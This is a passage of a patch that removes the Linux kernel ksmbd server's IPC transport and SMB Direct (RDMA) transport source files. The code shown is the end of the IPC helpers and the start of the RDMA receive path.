+-struct ksmbd_rpc_command *ksmbd_rpc_write(struct ksmbd_session *sess, int handle,
+-					  void *payload, size_t payload_sz)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= rpc_context_flags(sess);
+-	req->flags |= KSMBD_RPC_WRITE_METHOD;
+-	req->payload_sz = payload_sz;
+-	memcpy(req->payload, payload, payload_sz);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_read(struct ksmbd_session *sess, int handle)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= rpc_context_flags(sess);
+-	req->flags |= KSMBD_RPC_READ_METHOD;
+-	req->payload_sz = 0;
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_ioctl(struct ksmbd_session *sess, int handle,
+-					  void *payload, size_t payload_sz)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= rpc_context_flags(sess);
+-	req->flags |= KSMBD_RPC_IOCTL_METHOD;
+-	req->payload_sz = payload_sz;
+-	memcpy(req->payload, payload, payload_sz);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_rap(struct ksmbd_session *sess, void *payload,
+-					size_t payload_sz)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	req->flags = rpc_context_flags(sess);
+-	req->flags |= KSMBD_RPC_RAP_METHOD;
+-	req->payload_sz = payload_sz;
+-	memcpy(req->payload, payload, payload_sz);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-static int __ipc_heartbeat(void)
+-{
+-	unsigned long delta;
+-
+-	if (!ksmbd_server_running())
+-		return 0;
+-
+-	if (time_after(jiffies, server_conf.ipc_last_active)) {
+-		delta = (jiffies - server_conf.ipc_last_active);
+-	} else {
+-		ipc_update_last_active();
+-		schedule_delayed_work(&ipc_timer_work,
+-				      server_conf.ipc_timeout);
+-		return 0;
+-	}
+-
+-	if (delta < server_conf.ipc_timeout) {
+-		schedule_delayed_work(&ipc_timer_work,
+-				      server_conf.ipc_timeout - delta);
+-		return 0;
+-	}
+-
+-	if (ksmbd_ipc_heartbeat_request() == 0) {
+-		schedule_delayed_work(&ipc_timer_work,
+-				      server_conf.ipc_timeout);
+-		return 0;
+-	}
+-
+-	mutex_lock(&startup_lock);
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_RESETTING);
+-	server_conf.ipc_last_active = 0;
+-	ksmbd_tools_pid = 0;
+-	pr_err("No IPC daemon response for %lus\n", delta / HZ);
+-	mutex_unlock(&startup_lock);
+-	return -EINVAL;
+-}
+-
+-static void ipc_timer_heartbeat(struct work_struct *w)
+-{
+-	if (__ipc_heartbeat())
+-		server_queue_ctrl_reset_work();
+-}
+-
+-int ksmbd_ipc_id_alloc(void)
+-{
+-	return ksmbd_acquire_id(&ipc_ida);
+-}
+-
+-void ksmbd_rpc_id_free(int handle)
+-{
+-	ksmbd_release_id(&ipc_ida, handle);
+-}
+-
+-void ksmbd_ipc_release(void)
+-{
+-	cancel_delayed_work_sync(&ipc_timer_work);
+-	genl_unregister_family(&ksmbd_genl_family);
+-}
+-
+-void ksmbd_ipc_soft_reset(void)
+-{
+-	mutex_lock(&startup_lock);
+-	ksmbd_tools_pid = 0;
+-	cancel_delayed_work_sync(&ipc_timer_work);
+-	mutex_unlock(&startup_lock);
+-}
+-
+-int ksmbd_ipc_init(void)
+-{
+-	int ret = 0;
+-
+-	ksmbd_nl_init_fixup();
+-	INIT_DELAYED_WORK(&ipc_timer_work, ipc_timer_heartbeat);
+-
+-	ret = genl_register_family(&ksmbd_genl_family);
+-	if (ret) {
+-		pr_err("Failed to register KSMBD netlink interface %d\n", ret);
+-		cancel_delayed_work_sync(&ipc_timer_work);
+-	}
+-
+-	return ret;
+-}
+diff --git a/fs/ksmbd/transport_ipc.h b/fs/ksmbd/transport_ipc.h
+deleted file mode 100644
+index 5e5b90a0c1879..0000000000000
+--- a/fs/ksmbd/transport_ipc.h
++++ /dev/null
+@@ -1,47 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_TRANSPORT_IPC_H__
+-#define __KSMBD_TRANSPORT_IPC_H__
+-
+-#include <linux/wait.h>
+-
+-#define KSMBD_IPC_MAX_PAYLOAD	4096
+-
+-struct ksmbd_login_response *
+-ksmbd_ipc_login_request(const char *account);
+-
+-struct ksmbd_session;
+-struct ksmbd_share_config;
+-struct ksmbd_tree_connect;
+-struct sockaddr;
+-
+-struct ksmbd_tree_connect_response *
+-ksmbd_ipc_tree_connect_request(struct ksmbd_session *sess,
+-			       struct ksmbd_share_config *share,
+-			       struct ksmbd_tree_connect *tree_conn,
+-			       struct sockaddr *peer_addr);
+-int ksmbd_ipc_tree_disconnect_request(unsigned long long session_id,
+-				      unsigned long long connect_id);
+-int ksmbd_ipc_logout_request(const char *account, int flags);
+-struct ksmbd_share_config_response *
+-ksmbd_ipc_share_config_request(const char *name);
+-struct ksmbd_spnego_authen_response *
+-ksmbd_ipc_spnego_authen_request(const char *spnego_blob, int blob_len);
+-int ksmbd_ipc_id_alloc(void);
+-void ksmbd_rpc_id_free(int handle);
+-struct ksmbd_rpc_command *ksmbd_rpc_open(struct ksmbd_session *sess, int handle);
+-struct ksmbd_rpc_command *ksmbd_rpc_close(struct ksmbd_session *sess, int handle);
+-struct ksmbd_rpc_command *ksmbd_rpc_write(struct ksmbd_session *sess, int handle,
+-					  void *payload, size_t payload_sz);
+-struct ksmbd_rpc_command *ksmbd_rpc_read(struct ksmbd_session *sess, int handle);
+-struct ksmbd_rpc_command *ksmbd_rpc_ioctl(struct ksmbd_session *sess, int handle,
+-					  void *payload, size_t payload_sz);
+-struct ksmbd_rpc_command *ksmbd_rpc_rap(struct ksmbd_session *sess, void *payload,
+-					size_t payload_sz);
+-void ksmbd_ipc_release(void);
+-void ksmbd_ipc_soft_reset(void);
+-int ksmbd_ipc_init(void);
+-#endif /* __KSMBD_TRANSPORT_IPC_H__ */
+diff --git a/fs/ksmbd/transport_rdma.c b/fs/ksmbd/transport_rdma.c
+deleted file mode 100644
+index c06efc020bd95..0000000000000
+--- a/fs/ksmbd/transport_rdma.c
++++ /dev/null
+@@ -1,2273 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2017, Microsoft Corporation.
+- *   Copyright (C) 2018, LG Electronics.
+- *
+- *   Author(s): Long Li <longli@microsoft.com>,
+- *		Hyunchul Lee <hyc.lee@gmail.com>
+- */
+-
+-#define SUBMOD_NAME	"smb_direct"
+-
+-#include <linux/kthread.h>
+-#include <linux/list.h>
+-#include <linux/mempool.h>
+-#include <linux/highmem.h>
+-#include <linux/scatterlist.h>
+-#include <rdma/ib_verbs.h>
+-#include <rdma/rdma_cm.h>
+-#include <rdma/rw.h>
+-
+-#include "glob.h"
+-#include "connection.h"
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "transport_rdma.h"
+-
+-#define SMB_DIRECT_PORT_IWARP		5445
+-#define SMB_DIRECT_PORT_INFINIBAND	445
+-
+-#define SMB_DIRECT_VERSION_LE		cpu_to_le16(0x0100)
+-
+-/* SMB_DIRECT negotiation timeout in seconds */
+-#define SMB_DIRECT_NEGOTIATE_TIMEOUT		120
+-
+-#define SMB_DIRECT_MAX_SEND_SGES		6
+-#define SMB_DIRECT_MAX_RECV_SGES		1
+-
+-/*
+- * Default maximum number of RDMA read/write outstanding on this connection
+- * This value is possibly decreased during QP creation on hardware limit
+- */
+-#define SMB_DIRECT_CM_INITIATOR_DEPTH		8
+-
+-/* Maximum number of retries on data transfer operations */
+-#define SMB_DIRECT_CM_RETRY			6
+-/* No need to retry on Receiver Not Ready since SMB_DIRECT manages credits */
+-#define SMB_DIRECT_CM_RNR_RETRY		0
+-
+-/*
+- * User configurable initial values per SMB_DIRECT transport connection
+- * as defined in [MS-SMBD] 3.1.1.1
+- * Those may change after a SMB_DIRECT negotiation
+- */
+-
+-/* Set 445 port to SMB Direct port by default */
+-static int smb_direct_port = SMB_DIRECT_PORT_INFINIBAND;
+-
+-/* The local peer's maximum number of credits to grant to the peer */
+-static int smb_direct_receive_credit_max = 255;
+-
+-/* The remote peer's credit request of local peer */
+-static int smb_direct_send_credit_target = 255;
+-
+-/* The maximum single message size can be sent to remote peer */
+-static int smb_direct_max_send_size = 1364;
+-
+-/*  The maximum fragmented upper-layer payload receive size supported */
+-static int smb_direct_max_fragmented_recv_size = 1024 * 1024;
+-
+-/*  The maximum single-message size which can be received */
+-static int smb_direct_max_receive_size = 1364;
+-
+-static int smb_direct_max_read_write_size = SMBD_DEFAULT_IOSIZE;
+-
+-static LIST_HEAD(smb_direct_device_list);
+-static DEFINE_RWLOCK(smb_direct_device_lock);
+-
+-struct smb_direct_device {
+-	struct ib_device	*ib_dev;
+-	struct list_head	list;
+-};
+-
+-static struct smb_direct_listener {
+-	struct rdma_cm_id	*cm_id;
+-} smb_direct_listener;
+-
+-static struct workqueue_struct *smb_direct_wq;
+-
+-enum smb_direct_status {
+-	SMB_DIRECT_CS_NEW = 0,
+-	SMB_DIRECT_CS_CONNECTED,
+-	SMB_DIRECT_CS_DISCONNECTING,
+-	SMB_DIRECT_CS_DISCONNECTED,
+-};
+-
+-struct smb_direct_transport {
+-	struct ksmbd_transport	transport;
+-
+-	enum smb_direct_status	status;
+-	bool			full_packet_received;
+-	wait_queue_head_t	wait_status;
+-
+-	struct rdma_cm_id	*cm_id;
+-	struct ib_cq		*send_cq;
+-	struct ib_cq		*recv_cq;
+-	struct ib_pd		*pd;
+-	struct ib_qp		*qp;
+-
+-	int			max_send_size;
+-	int			max_recv_size;
+-	int			max_fragmented_send_size;
+-	int			max_fragmented_recv_size;
+-	int			max_rdma_rw_size;
+-
+-	spinlock_t		reassembly_queue_lock;
+-	struct list_head	reassembly_queue;
+-	int			reassembly_data_length;
+-	int			reassembly_queue_length;
+-	int			first_entry_offset;
+-	wait_queue_head_t	wait_reassembly_queue;
+-
+-	spinlock_t		receive_credit_lock;
+-	int			recv_credits;
+-	int			count_avail_recvmsg;
+-	int			recv_credit_max;
+-	int			recv_credit_target;
+-
+-	spinlock_t		recvmsg_queue_lock;
+-	struct list_head	recvmsg_queue;
+-
+-	spinlock_t		empty_recvmsg_queue_lock;
+-	struct list_head	empty_recvmsg_queue;
+-
+-	int			send_credit_target;
+-	atomic_t		send_credits;
+-	spinlock_t		lock_new_recv_credits;
+-	int			new_recv_credits;
+-	int			max_rw_credits;
+-	int			pages_per_rw_credit;
+-	atomic_t		rw_credits;
+-
+-	wait_queue_head_t	wait_send_credits;
+-	wait_queue_head_t	wait_rw_credits;
+-
+-	mempool_t		*sendmsg_mempool;
+-	struct kmem_cache	*sendmsg_cache;
+-	mempool_t		*recvmsg_mempool;
+-	struct kmem_cache	*recvmsg_cache;
+-
+-	wait_queue_head_t	wait_send_pending;
+-	atomic_t		send_pending;
+-
+-	struct delayed_work	post_recv_credits_work;
+-	struct work_struct	send_immediate_work;
+-	struct work_struct	disconnect_work;
+-
+-	bool			negotiation_requested;
+-};
+-
+-#define KSMBD_TRANS(t) ((struct ksmbd_transport *)&((t)->transport))
+-
+-enum {
+-	SMB_DIRECT_MSG_NEGOTIATE_REQ = 0,
+-	SMB_DIRECT_MSG_DATA_TRANSFER
+-};
+-
+-static struct ksmbd_transport_ops ksmbd_smb_direct_transport_ops;
+-
+-struct smb_direct_send_ctx {
+-	struct list_head	msg_list;
+-	int			wr_cnt;
+-	bool			need_invalidate_rkey;
+-	unsigned int		remote_key;
+-};
+-
+-struct smb_direct_sendmsg {
+-	struct smb_direct_transport	*transport;
+-	struct ib_send_wr	wr;
+-	struct list_head	list;
+-	int			num_sge;
+-	struct ib_sge		sge[SMB_DIRECT_MAX_SEND_SGES];
+-	struct ib_cqe		cqe;
+-	u8			packet[];
+-};
+-
+-struct smb_direct_recvmsg {
+-	struct smb_direct_transport	*transport;
+-	struct list_head	list;
+-	int			type;
+-	struct ib_sge		sge;
+-	struct ib_cqe		cqe;
+-	bool			first_segment;
+-	u8			packet[];
+-};
+-
+-struct smb_direct_rdma_rw_msg {
+-	struct smb_direct_transport	*t;
+-	struct ib_cqe		cqe;
+-	int			status;
+-	struct completion	*completion;
+-	struct list_head	list;
+-	struct rdma_rw_ctx	rw_ctx;
+-	struct sg_table		sgt;
+-	struct scatterlist	sg_list[];
+-};
+-
+-void init_smbd_max_io_size(unsigned int sz)
+-{
+-	sz = clamp_val(sz, SMBD_MIN_IOSIZE, SMBD_MAX_IOSIZE);
+-	smb_direct_max_read_write_size = sz;
+-}
+-
+-unsigned int get_smbd_max_read_write_size(void)
+-{
+-	return smb_direct_max_read_write_size;
+-}
+-
+-static inline int get_buf_page_count(void *buf, int size)
+-{
+-	return DIV_ROUND_UP((uintptr_t)buf + size, PAGE_SIZE) -
+-		(uintptr_t)buf / PAGE_SIZE;
+-}
+-
+-static void smb_direct_destroy_pools(struct smb_direct_transport *transport);
+-static void smb_direct_post_recv_credits(struct work_struct *work);
+-static int smb_direct_post_send_data(struct smb_direct_transport *t,
+-				     struct smb_direct_send_ctx *send_ctx,
+-				     struct kvec *iov, int niov,
+-				     int remaining_data_length);
+-
+-static inline struct smb_direct_transport *
+-smb_trans_direct_transfort(struct ksmbd_transport *t)
+-{
+-	return container_of(t, struct smb_direct_transport, transport);
+-}
+-
+-static inline void
+-*smb_direct_recvmsg_payload(struct smb_direct_recvmsg *recvmsg)
+-{
+-	return (void *)recvmsg->packet;
+-}
+-
+-static inline bool is_receive_credit_post_required(int receive_credits,
+-						   int avail_recvmsg_count)
+-{
+-	return receive_credits <= (smb_direct_receive_credit_max >> 3) &&
+-		avail_recvmsg_count >= (receive_credits >> 2);
+-}
+-
+-static struct
+-smb_direct_recvmsg *get_free_recvmsg(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_recvmsg *recvmsg = NULL;
+-
+-	spin_lock(&t->recvmsg_queue_lock);
+-	if (!list_empty(&t->recvmsg_queue)) {
+-		recvmsg = list_first_entry(&t->recvmsg_queue,
+-					   struct smb_direct_recvmsg,
+-					   list);
+-		list_del(&recvmsg->list);
+-	}
+-	spin_unlock(&t->recvmsg_queue_lock);
+-	return recvmsg;
+-}
+-
+-static void put_recvmsg(struct smb_direct_transport *t,
+-			struct smb_direct_recvmsg *recvmsg)
+-{
+-	ib_dma_unmap_single(t->cm_id->device, recvmsg->sge.addr,
+-			    recvmsg->sge.length, DMA_FROM_DEVICE);
+-
+-	spin_lock(&t->recvmsg_queue_lock);
+-	list_add(&recvmsg->list, &t->recvmsg_queue);
+-	spin_unlock(&t->recvmsg_queue_lock);
+-}
+-
+-static struct
+-smb_direct_recvmsg *get_empty_recvmsg(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_recvmsg *recvmsg = NULL;
+-
+-	spin_lock(&t->empty_recvmsg_queue_lock);
+-	if (!list_empty(&t->empty_recvmsg_queue)) {
+-		recvmsg = list_first_entry(&t->empty_recvmsg_queue,
+-					   struct smb_direct_recvmsg, list);
+-		list_del(&recvmsg->list);
+-	}
+-	spin_unlock(&t->empty_recvmsg_queue_lock);
+-	return recvmsg;
+-}
+-
+-static void put_empty_recvmsg(struct smb_direct_transport *t,
+-			      struct smb_direct_recvmsg *recvmsg)
+-{
+-	ib_dma_unmap_single(t->cm_id->device, recvmsg->sge.addr,
+-			    recvmsg->sge.length, DMA_FROM_DEVICE);
+-
+-	spin_lock(&t->empty_recvmsg_queue_lock);
+-	list_add_tail(&recvmsg->list, &t->empty_recvmsg_queue);
+-	spin_unlock(&t->empty_recvmsg_queue_lock);
+-}
+-
+-static void enqueue_reassembly(struct smb_direct_transport *t,
+-			       struct smb_direct_recvmsg *recvmsg,
+-			       int data_length)
+-{
+-	spin_lock(&t->reassembly_queue_lock);
+-	list_add_tail(&recvmsg->list, &t->reassembly_queue);
+-	t->reassembly_queue_length++;
+-	/*
+-	 * Make sure reassembly_data_length is updated after list and
+-	 * reassembly_queue_length are updated. On the dequeue side
+-	 * reassembly_data_length is checked without a lock to determine
+-	 * if reassembly_queue_length and list is up to date
+-	 */
+-	virt_wmb();
+-	t->reassembly_data_length += data_length;
+-	spin_unlock(&t->reassembly_queue_lock);
+-}
+-
+-static struct smb_direct_recvmsg *get_first_reassembly(struct smb_direct_transport *t)
+-{
+-	if (!list_empty(&t->reassembly_queue))
+-		return list_first_entry(&t->reassembly_queue,
+-				struct smb_direct_recvmsg, list);
+-	else
+-		return NULL;
+-}
+-
+-static void smb_direct_disconnect_rdma_work(struct work_struct *work)
+-{
+-	struct smb_direct_transport *t =
+-		container_of(work, struct smb_direct_transport,
+-			     disconnect_work);
+-
+-	if (t->status == SMB_DIRECT_CS_CONNECTED) {
+-		t->status = SMB_DIRECT_CS_DISCONNECTING;
+-		rdma_disconnect(t->cm_id);
+-	}
+-}
+-
+-static void
+-smb_direct_disconnect_rdma_connection(struct smb_direct_transport *t)
+-{
+-	if (t->status == SMB_DIRECT_CS_CONNECTED)
+-		queue_work(smb_direct_wq, &t->disconnect_work);
+-}
+-
+-static void smb_direct_send_immediate_work(struct work_struct *work)
+-{
+-	struct smb_direct_transport *t = container_of(work,
+-			struct smb_direct_transport, send_immediate_work);
+-
+-	if (t->status != SMB_DIRECT_CS_CONNECTED)
+-		return;
+-
+-	smb_direct_post_send_data(t, NULL, NULL, 0, 0);
+-}
+-
+-static struct smb_direct_transport *alloc_transport(struct rdma_cm_id *cm_id)
+-{
+-	struct smb_direct_transport *t;
+-	struct ksmbd_conn *conn;
+-
+-	t = kzalloc(sizeof(*t), GFP_KERNEL);
+-	if (!t)
+-		return NULL;
+-
+-	t->cm_id = cm_id;
+-	cm_id->context = t;
+-
+-	t->status = SMB_DIRECT_CS_NEW;
+-	init_waitqueue_head(&t->wait_status);
+-
+-	spin_lock_init(&t->reassembly_queue_lock);
+-	INIT_LIST_HEAD(&t->reassembly_queue);
+-	t->reassembly_data_length = 0;
+-	t->reassembly_queue_length = 0;
+-	init_waitqueue_head(&t->wait_reassembly_queue);
+-	init_waitqueue_head(&t->wait_send_credits);
+-	init_waitqueue_head(&t->wait_rw_credits);
+-
+-	spin_lock_init(&t->receive_credit_lock);
+-	spin_lock_init(&t->recvmsg_queue_lock);
+-	INIT_LIST_HEAD(&t->recvmsg_queue);
+-
+-	spin_lock_init(&t->empty_recvmsg_queue_lock);
+-	INIT_LIST_HEAD(&t->empty_recvmsg_queue);
+-
+-	init_waitqueue_head(&t->wait_send_pending);
+-	atomic_set(&t->send_pending, 0);
+-
+-	spin_lock_init(&t->lock_new_recv_credits);
+-
+-	INIT_DELAYED_WORK(&t->post_recv_credits_work,
+-			  smb_direct_post_recv_credits);
+-	INIT_WORK(&t->send_immediate_work, smb_direct_send_immediate_work);
+-	INIT_WORK(&t->disconnect_work, smb_direct_disconnect_rdma_work);
+-
+-	conn = ksmbd_conn_alloc();
+-	if (!conn)
+-		goto err;
+-	conn->transport = KSMBD_TRANS(t);
+-	KSMBD_TRANS(t)->conn = conn;
+-	KSMBD_TRANS(t)->ops = &ksmbd_smb_direct_transport_ops;
+-	return t;
+-err:
+-	kfree(t);
+-	return NULL;
+-}
+-
+-static void free_transport(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_recvmsg *recvmsg;
+-
+-	wake_up_interruptible(&t->wait_send_credits);
+-
+-	ksmbd_debug(RDMA, "wait for all send posted to IB to finish\n");
+-	wait_event(t->wait_send_pending,
+-		   atomic_read(&t->send_pending) == 0);
+-
+-	cancel_work_sync(&t->disconnect_work);
+-	cancel_delayed_work_sync(&t->post_recv_credits_work);
+-	cancel_work_sync(&t->send_immediate_work);
+-
+-	if (t->qp) {
+-		ib_drain_qp(t->qp);
+-		ib_mr_pool_destroy(t->qp, &t->qp->rdma_mrs);
+-		ib_destroy_qp(t->qp);
+-	}
+-
+-	ksmbd_debug(RDMA, "drain the reassembly queue\n");
+-	do {
+-		spin_lock(&t->reassembly_queue_lock);
+-		recvmsg = get_first_reassembly(t);
+-		if (recvmsg) {
+-			list_del(&recvmsg->list);
+-			spin_unlock(&t->reassembly_queue_lock);
+-			put_recvmsg(t, recvmsg);
+-		} else {
+-			spin_unlock(&t->reassembly_queue_lock);
+-		}
+-	} while (recvmsg);
+-	t->reassembly_data_length = 0;
+-
+-	if (t->send_cq)
+-		ib_free_cq(t->send_cq);
+-	if (t->recv_cq)
+-		ib_free_cq(t->recv_cq);
+-	if (t->pd)
+-		ib_dealloc_pd(t->pd);
+-	if (t->cm_id)
+-		rdma_destroy_id(t->cm_id);
+-
+-	smb_direct_destroy_pools(t);
+-	ksmbd_conn_free(KSMBD_TRANS(t)->conn);
+-	kfree(t);
+-}
+-
+-static struct smb_direct_sendmsg
+-*smb_direct_alloc_sendmsg(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_sendmsg *msg;
+-
+-	msg = mempool_alloc(t->sendmsg_mempool, GFP_KERNEL);
+-	if (!msg)
+-		return ERR_PTR(-ENOMEM);
+-	msg->transport = t;
+-	INIT_LIST_HEAD(&msg->list);
+-	msg->num_sge = 0;
+-	return msg;
+-}
+-
+-static void smb_direct_free_sendmsg(struct smb_direct_transport *t,
+-				    struct smb_direct_sendmsg *msg)
+-{
+-	int i;
+-
+-	if (msg->num_sge > 0) {
+-		ib_dma_unmap_single(t->cm_id->device,
+-				    msg->sge[0].addr, msg->sge[0].length,
+-				    DMA_TO_DEVICE);
+-		for (i = 1; i < msg->num_sge; i++)
+-			ib_dma_unmap_page(t->cm_id->device,
+-					  msg->sge[i].addr, msg->sge[i].length,
+-					  DMA_TO_DEVICE);
+-	}
+-	mempool_free(msg, t->sendmsg_mempool);
+-}
+-
+-static int smb_direct_check_recvmsg(struct smb_direct_recvmsg *recvmsg)
+-{
+-	switch (recvmsg->type) {
+-	case SMB_DIRECT_MSG_DATA_TRANSFER: {
+-		struct smb_direct_data_transfer *req =
+-			(struct smb_direct_data_transfer *)recvmsg->packet;
+-		struct smb2_hdr *hdr = (struct smb2_hdr *)(recvmsg->packet
+-				+ le32_to_cpu(req->data_offset));
+-		ksmbd_debug(RDMA,
+-			    "CreditGranted: %u, CreditRequested: %u, DataLength: %u, RemainingDataLength: %u, SMB: %x, Command: %u\n",
+-			    le16_to_cpu(req->credits_granted),
+-			    le16_to_cpu(req->credits_requested),
+-			    req->data_length, req->remaining_data_length,
+-			    hdr->ProtocolId, hdr->Command);
+-		break;
+-	}
+-	case SMB_DIRECT_MSG_NEGOTIATE_REQ: {
+-		struct smb_direct_negotiate_req *req =
+-			(struct smb_direct_negotiate_req *)recvmsg->packet;
+-		ksmbd_debug(RDMA,
+-			    "MinVersion: %u, MaxVersion: %u, CreditRequested: %u, MaxSendSize: %u, MaxRecvSize: %u, MaxFragmentedSize: %u\n",
+-			    le16_to_cpu(req->min_version),
+-			    le16_to_cpu(req->max_version),
+-			    le16_to_cpu(req->credits_requested),
+-			    le32_to_cpu(req->preferred_send_size),
+-			    le32_to_cpu(req->max_receive_size),
+-			    le32_to_cpu(req->max_fragmented_size));
+-		if (le16_to_cpu(req->min_version) > 0x0100 ||
+-		    le16_to_cpu(req->max_version) < 0x0100)
+-			return -EOPNOTSUPP;
+-		if (le16_to_cpu(req->credits_requested) <= 0 ||
+-		    le32_to_cpu(req->max_receive_size) <= 128 ||
+-		    le32_to_cpu(req->max_fragmented_size) <=
+-					128 * 1024)
+-			return -ECONNABORTED;
+-
+-		break;
+-	}
+-	default:
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+-
+-static void recv_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smb_direct_recvmsg *recvmsg;
+-	struct smb_direct_transport *t;
+-
+-	recvmsg = container_of(wc->wr_cqe, struct smb_direct_recvmsg, cqe);
+-	t = recvmsg->transport;
+-
+-	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_RECV) {
+-		if (wc->status != IB_WC_WR_FLUSH_ERR) {
+-			pr_err("Recv error. status='%s (%d)' opcode=%d\n",
+-			       ib_wc_status_msg(wc->status), wc->status,
+-			       wc->opcode);
+-			smb_direct_disconnect_rdma_connection(t);
+-		}
+-		put_empty_recvmsg(t, recvmsg);
+-		return;
+-	}
+-
+-	ksmbd_debug(RDMA, "Recv completed. status='%s (%d)', opcode=%d\n",
+-		    ib_wc_status_msg(wc->status), wc->status,
+-		    wc->opcode);
+-
+-	ib_dma_sync_single_for_cpu(wc->qp->device, recvmsg->sge.addr,
+-				   recvmsg->sge.length, DMA_FROM_DEVICE);
+-
+-	switch (recvmsg->type) {
+-	case SMB_DIRECT_MSG_NEGOTIATE_REQ:
+-		if (wc->byte_len < sizeof(struct smb_direct_negotiate_req)) {
+-			put_empty_recvmsg(t, recvmsg);
+-			return;
+-		}
+-		t->negotiation_requested = true;
+-		t->full_packet_received = true;
+-		t->status = SMB_DIRECT_CS_CONNECTED;
+-		enqueue_reassembly(t, recvmsg, 0);
+-		wake_up_interruptible(&t->wait_status);
+-		break;
+-	case SMB_DIRECT_MSG_DATA_TRANSFER: {
+-		struct smb_direct_data_transfer *data_transfer =
+-			(struct smb_direct_data_transfer *)recvmsg->packet;
+-		unsigned int data_length;
+-		int avail_recvmsg_count, receive_credits;
+-
+-		if (wc->byte_len <
+-		    offsetof(struct smb_direct_data_transfer, padding)) {
+-			put_empty_recvmsg(t, recvmsg);
+-			return;
+-		}
+-
+-		data_length = le32_to_cpu(data_transfer->data_length);
+-		if (data_length) {
+-			if (wc->byte_len < sizeof(struct smb_direct_data_transfer) +
+-			    (u64)data_length) {
+-				put_empty_recvmsg(t, recvmsg);
+-				return;
+-			}
+-
+-			if (t->full_packet_received)
+-				recvmsg->first_segment = true;
+-
+-			if (le32_to_cpu(data_transfer->remaining_data_length))
+-				t->full_packet_received = false;
+-			else
+-				t->full_packet_received = true;
+-
+-			enqueue_reassembly(t, recvmsg, (int)data_length);
+-			wake_up_interruptible(&t->wait_reassembly_queue);
+-
+-			spin_lock(&t->receive_credit_lock);
+-			receive_credits = --(t->recv_credits);
+-			avail_recvmsg_count = t->count_avail_recvmsg;
+-			spin_unlock(&t->receive_credit_lock);
+-		} else {
+-			put_empty_recvmsg(t, recvmsg);
+-
+-			spin_lock(&t->receive_credit_lock);
+-			receive_credits = --(t->recv_credits);
+-			avail_recvmsg_count = ++(t->count_avail_recvmsg);
+-			spin_unlock(&t->receive_credit_lock);
+-		}
+-
+-		t->recv_credit_target =
+-				le16_to_cpu(data_transfer->credits_requested);
+-		atomic_add(le16_to_cpu(data_transfer->credits_granted),
+-			   &t->send_credits);
+-
+-		if (le16_to_cpu(data_transfer->flags) &
+-		    SMB_DIRECT_RESPONSE_REQUESTED)
+-			queue_work(smb_direct_wq, &t->send_immediate_work);
+-
+-		if (atomic_read(&t->send_credits) > 0)
+-			wake_up_interruptible(&t->wait_send_credits);
+-
+-		if (is_receive_credit_post_required(receive_credits, avail_recvmsg_count))
+-			mod_delayed_work(smb_direct_wq,
+-					 &t->post_recv_credits_work, 0);
+-		break;
+-	}
+-	default:
+-		break;
+-	}
+-}
+-
+-static int smb_direct_post_recv(struct smb_direct_transport *t,
+-				struct smb_direct_recvmsg *recvmsg)
+-{
+-	struct ib_recv_wr wr;
+-	int ret;
+-
+-	recvmsg->sge.addr = ib_dma_map_single(t->cm_id->device,
+-					      recvmsg->packet, t->max_recv_size,
+-					      DMA_FROM_DEVICE);
+-	ret = ib_dma_mapping_error(t->cm_id->device, recvmsg->sge.addr);
+-	if (ret)
+-		return ret;
+-	recvmsg->sge.length = t->max_recv_size;
+-	recvmsg->sge.lkey = t->pd->local_dma_lkey;
+-	recvmsg->cqe.done = recv_done;
+-
